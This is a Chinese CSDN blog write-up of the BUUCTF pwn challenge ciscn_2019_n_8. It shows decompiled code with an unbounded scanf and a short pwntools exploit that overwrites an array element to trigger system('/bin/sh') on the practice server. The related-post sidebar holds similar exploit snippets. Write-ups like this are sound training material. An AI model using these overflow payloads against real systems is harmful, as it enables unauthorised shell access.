BUUCTF ciscn_2019_n_8

最新推荐文章于 2024-04-14 22:13:54 发布
最新推荐文章于 2024-04-14 22:13:54 发布
阅读量256 收藏 1
点赞数 1
分类专栏: Pwn 文章标签: linux python 网络 网络安全 学习
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_29912475/article/details/127612927
版权

一道通过Checksec让没看源代码的你觉得难度很高的题

1.Checksec & IDA Pro

保护除了RELRO全开。

只有main函数

int __cdecl main(int argc, const char **argv, const char **envp)
{
  int v4; // [esp-14h] [ebp-20h]
  int v5; // [esp-10h] [ebp-1Ch]

  var[13] = 0; // 设 var[13] 为 0
  var[14] = 0; // 设 var[14] 为 0
  init();
  puts("What's your name?");
  __isoc99_scanf("%s", var, v4, v5); // 没有输入上限
  if ( *(_QWORD *)&var[13] )
  {
    if ( *(_QWORD *)&var[13] == 17LL ) // var[13] = 17 , getshell
      system("/bin/sh");
    else
      printf(
        "something wrong! val is %d",
        var[0],
        var[1],
        var[2],
        var[3],
        var[4],
        var[5],
        var[6],
        var[7],
        var[8],
        var[9],
        var[10],
        var[11],
        var[12],
        var[13],
        var[14]);
  }
  else
  {
    printf("%s, Welcome!\n", var);
    puts("Try do something~");
  }
  return 0;
}

2.构造PoC

from pwn import *

#io = process("/root/Desktop/PwnSubjects/ciscn_2019_n_8")
io = remote("node4.buuoj.cn",28282)

payload = p32(17) * 14

io.recv()
io.sendline(payload)
io.interactive()

原理解析:

scanf函数无输入上限,var是一个数组

var[13] 、 var[14] 已经被初始化为0

因此只需要输入 14 次 17 , 即可达到 var[13] = 17 的结果。

Red-Leaves
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
buuctf——ciscn_2019_n_8
qq_41560595的博客
03-21 528
查看权限 开了好多权限 查看源代码 分析 观察,var数组是int类型,在内存中占了4个字节。输入一个字符串,令var[13]处的值是17,且这个值占4个字节,就能拿到shell。 var中每一个元素占4个字节,payload必须构造成"A"*13才能将前13个位置占满。第14个位置要求是4字节,就要用p64打包。 解题代码 from pwn import * #p=process("./ciscn") p=remote("node3.buuoj.cn",25337) payload=b'AAAA'*
get_started_3dsctf_2016|get_started_3dsctf_2016
12-11
网络安全逆向PWN题目,简单的栈溢出,虽然有后门函数,但同时又给了一定的限制条件,可以使用更复杂的ROP解法。该样本题解:https://blog.csdn.net/A951860555/article/details/111030289
[buuctf]ciscn_2019_n_8
逆向萌新的博客
06-19 438
[buuctf]ciscn_2019_n_8
ctf【ciscn_2019_n_8】
HUANGliang_的博客
10-29 241
缓冲区溢出漏洞
ciscn_2019_n_8题解
OrientalGlass的博客
01-08 234
是以&var[13]为起始地址的八个内存单元,由于是小端存储,所以覆盖要使得v[13]=0,v[14]=17。很显然输入字符串覆盖var数组里的值满足要求即可。1.checksec查看,保护全开感觉不妙。3.程序逻辑并不复杂,脚本很简单。2.ida打开查看程序。
BUUCTF逆向前八题
01-24
在本篇中,我们将探讨在BUUCTF储备赛中遇到的前八道逆向题目,通过这些题目来学习如何使用逆向工具,如exeinfo和IDA,以及如何解析汇编代码以获取关键信息。 1. Easyre: 这道题首先使用exeinfo查看文件信息,确认...
BUUCTF-PWN-[ZJCTF 2019]Login
07-10
BUUCTF-PWN-[ZJCTF 2019]Login
BUUCTF】web之强网杯2019随便注
12-14
开始注入: 1’ : 报错 1’ #:回显正常 1’ order by 1 #: 正常(经测试列数为2–此处小白暗自窃喜) 1’ union select 1,2#: 回显 如图 看来此方法是行不通了,但经过苦苦寻求,了解到了堆叠注入: ...
BasicASM.s(BUUCTF
06-04
分析过程文件
ciscn_2019_n_3
12-30
ciscn(全国大学生信息安全竞赛),2019年的一道题目,涉及到fastbin堆漏洞的利用。由于调用了system函数,所以漏洞利用的难度不大,推荐初学者练习。题解链接:https://blog.csdn.net/A951860555/article/details/111991072
[BUUCTF] ciscn_2019_n_8
最新发布
Lucien_Carr的博客
04-14 237
这道题非常简单(甚至比ret2text简单...),只需要满足让系统调用system函数的条件,即将var[13]这个数组里全部填上17即可。checksec --file='filename' # filename为下载文件的自定义名称。观察选择条件,只需要满足var[13] = 17就可以。前面有scanf函数,可以直接向var数组输入。开了canary、NX和PIE,似乎防得很严实。主函数里就调用了system函数,运气很好。32位程序,放到IDA中继续分析。攻击成功,运行结果如下。
BUUCTF pwn——ciscn_2019_n_8
CNS-Enterprise BCC-1701-J
03-15 147
BUUCTF 做题练习
Buuctf(pwn)ciscn_2019_n_8
半岛铁盒的博客
03-28 231
保护开的挺全; from pwn import* r=remote('node3.buuoj.cn',28155) payload = p32(17)*14 r.sendline(payload) r.interactive() 没利用漏洞,简单的输入满足条件就好了
BUUCTF Pwn ciscn_2019_n_8 1
MrTreebook的博客
12-05 853
ciscn_2019_n_8 11.题目下载地址2.checksec检查保护3.IDA分析4.exp 1.题目下载地址 点击下载题目 2.checksec检查保护 所有保护全开,现在也不知道有什么办法 试着运行一下,可能又是canary绕过 3.IDA分析 init(); puts("What's your name?"); __isoc99_scanf("%s", var, v4, v5); if ( *(_QWORD *)&var[13] ) { if ( *(_
buuoj-Pwn-刷题记录
Do1phln的博客
10-30 305
warmup_csaw_2016 题目直接给出了函数位置,所以很明显就是要利用gets,gets参数的长度为0x40,所以我们再加上返回地址的8个字节,溢出的总长度为0x48,运行时候可以看出sub_40060D的地址就是它的名字,因此我们可以构建payload payload = b'a'*0x48+p64(0x40060D) 即可得到flag ciscn_2019_n_1 打开题目可知大致意思是main函数里面调用了一过func函数,其中要输入v1,但是要判断v2,所以就很明显是需要输入长字符串覆盖到
buuctf ciscn_2019_n_8
carol2358的博客
04-15 266
ida: 直接有sh,只要让var[13]等于17就可以 exp: from pwn import * from LibcSearcher import * context.os='linux' context.arch='i386' context.log_level='debug' ru=lambda x:io.recvuntil(x) rl=lambda :io.recvl...
BUUCTF|PWN-ciscn_2019_n_8-WP(格式化字符串漏洞)
l2645470582_的博客
01-11 2265
1.检查保护机制 (1)保护全开 2.运行看一下 3.我们用32位的IDA打开该文件 (1)Ctrl+F12查看关键字符串 (2)查看反编译代码 (3)条件满足var[13]!=0 &&var[13] ==17,才能拿到权限 (4)var[13]位置在第十四个上 payload构造 第一种: payload = b'a'*13*4 + p32(17) #qword/IDA在32位里面是4个字节,在64位是/8个字节 ...
2021 rois暑假集训——栈溢出与简单的rop链(buuctf练习)
weixin_56780239的博客
08-07 1212
2021年暑假参加集训,在buuctf上做的几道题的writeup.
buuctf luky_guy
09-28
Luky库是一组抽象复杂操作的Java类,它提供了各种功能,包括网络...根据提供的引用内容,无法直接了解到buuctf luky_guy的具体信息。如果您能提供更多关于buuctf luky_guy的背景信息,我可以尝试为您提供更准确的答案。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值